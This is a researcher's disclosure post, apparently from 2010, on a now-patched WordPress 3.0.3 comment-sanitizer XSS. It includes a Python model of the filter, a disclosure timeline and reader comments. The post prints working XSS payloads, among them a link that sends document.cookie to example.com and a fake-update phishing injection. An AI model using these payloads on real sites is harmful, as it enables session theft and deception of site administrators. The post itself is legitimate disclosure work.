Hello guys! :)
A new version of Wordpress was released a few hours ago, as you can see here. It fixes a critical vulnerability, and the Wordpress Twitter profile called it "the most important security release of the year" (tweet).
[+] Plaintext advisory
I want to show you some details about this vulnerability (which I discovered); it could be really dangerous not to update your Wordpress blog. Other contributions come from Jon Cave (duck_), a Wordpress core contributor.
Analysis
Here are some extracts from the mail I sent to the Wordpress security team.
The default install of Wordpress 3.0.3 allows comments like the following to be inserted in order to publish a link to other sites:
<a href="http://site.it">click me</a>
The protocol check is only done when the href attribute is written in lower case, so an attacker can insert any kind of protocol into the href attribute with a vector like the following:
<a HREF="javascript:alert(0)">click me</a>
This is a very bad way to sanitize HTML! We can bypass the protocol filtering by exploiting the case-sensitive matching. It is also possible to steal the cookies of a logged-in user in a trivial way:
<a HREF="javascript:open('http://example.com/?cookie=' + document.cookie)">jjj</a>
A more effective attack is also possible, for example by inserting something like this:
<a HREF="javascript:eval(document.getElementById('site-title').innerHTML+=' IMPORTANT WORDPRESS UPDATE, go to badsite.com to download it!');">nice site</a>
An inexperienced admin could click on the link and see a fake update alert in their private section. That is very, very bad! Take a look at the screenshot to get an idea.
Wordpress requires each comment to be approved, but a careless administrator could approve a fake comment that looks fine, or could simply click on the injected link.
So why not use a simple obfuscation method? Base64 encoding is perfect in this case:
<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">click here</a>
The issue was in kses.php, the HTML sanitization library. The protocol check should be done in every case, whether the attribute name is written in lower case or upper case. You can find all further information about the fix here. As you can see, strtolower($attrname) has been used to overcome the issue.
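To make the root cause concrete, here is an added example (written for this post, not the kses.php code) that models the href filter in both forms: the name compared case-sensitively, as in 3.0.3, and the name lowercased first, as in the 3.0.4 fix. The attribute and protocol allowlists are assumptions chosen to mirror the comment defaults.

```python
import re

# Assumed allowlists for <a> in comments (illustrative, not the real kses tables).
ALLOWED_ATTRS = {"href", "title", "rel"}          # attributes kept on <a>
URI_ATTRS = {"href"}                              # attributes that get a protocol check
ALLOWED_PROTOCOLS = {"http", "https", "ftp", "mailto"}

_ATTR_RE = re.compile(r'([A-Za-z-]+)\s*=\s*"([^"]*)"')
_SCHEME_RE = re.compile(r"\s*([A-Za-z][A-Za-z0-9+.-]*):")


def strip_bad_protocol(value: str) -> str:
    """Model of wp_kses_bad_protocol: peel off leading schemes that are not
    allowlisted, so 'javascript:alert(0)' becomes 'alert(0)'."""
    while True:
        m = _SCHEME_RE.match(value)
        if m is None or m.group(1).lower() in ALLOWED_PROTOCOLS:
            return value
        value = value[m.end():]


def filter_anchor(tag: str, lowercase_names: bool) -> str:
    """Filter the attributes of one <a ...> tag.

    lowercase_names=False reproduces the 3.0.3 behaviour described above: the
    name is compared case-sensitively, so HREF is never recognised as a URI
    attribute and its value skips the protocol check entirely.
    lowercase_names=True applies the 3.0.4 fix (strtolower on the name).
    """
    kept = []
    for name, value in _ATTR_RE.findall(tag):
        if name.lower() not in ALLOWED_ATTRS:
            continue                      # unknown attribute: dropped
        check_name = name.lower() if lowercase_names else name
        if check_name in URI_ATTRS:
            value = strip_bad_protocol(value)
        kept.append(f'{name}="{value}"')
    return "<a " + " ".join(kept) + ">" if kept else "<a>"


def has_unfiltered_scheme(tag: str) -> bool:
    """Defender's check: does a kept URI attribute still carry a scheme that
    the filter should have removed?"""
    for name, value in _ATTR_RE.findall(tag):
        if name.lower() in URI_ATTRS and strip_bad_protocol(value) != value:
            return True
    return False
```

Running the two modes over the vectors quoted in this post shows the uppercase HREF passing through untouched in the first mode and losing its scheme in the second.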
Disclosure timeline
20101219 Vendor contact
20101220 Vendor proposes a patch
20101220 The patch is ok in my opinion
20101220 Vendor takes time to fully audit and test kses.php
20101229 Wordpress 3.0.4 release
I wish you a happy new year :)
Great and useful hints. Thanks a lot.
Congratulations and thanks from a heavy Wordpress user :)
Hello,
Is this vulnerability for the news posts (in the admin panel) and the comments on a post too?
Kind regards
Hello nora, this vuln is for the comments filter!
there is another xss vulnerability also with this new wp version 3.0.4
look here http://pastebin.com/VSbnX3nk
Naah, that was a *false* issue!
Info at http://wpdevel.wordpress.com/2010/12/31/the-published-exploit-for-wordpress-3-0-4-isnt-accurate/
what a good job, you've done
Hi mate,
If I didn't click those links, it won't be a matter, right?
Because when I saw those spam comments, I usually delete it directly.. I really want to update to 3.04, but I don't think all those add-ons would be compatible
Hi Simon, if you don't click on those links, then you are not completely safe!
In fact the issue remains: a user who visits your blog can click on a malicious link contained in a post comment!
So you have to be really careful while approving a comment!
> I don't think all those add-ons would be compatible
Sorry, but I don't know that. Ask the Wordpress team.
Great hint, thanks!
I'm using a lot of WP sites to promote my customers' activities and I was not aware of this vulnerability.
That's all good news!
That's not where the issues end. http://pastebin.com/VSbnX3nk exposes another xss vulnerability in version 3.0.4
@Michelle http://wpdevel.wordpress.com/2010/12/31/the-published-exploit-for-wordpress-3-0-4-isnt-accurate/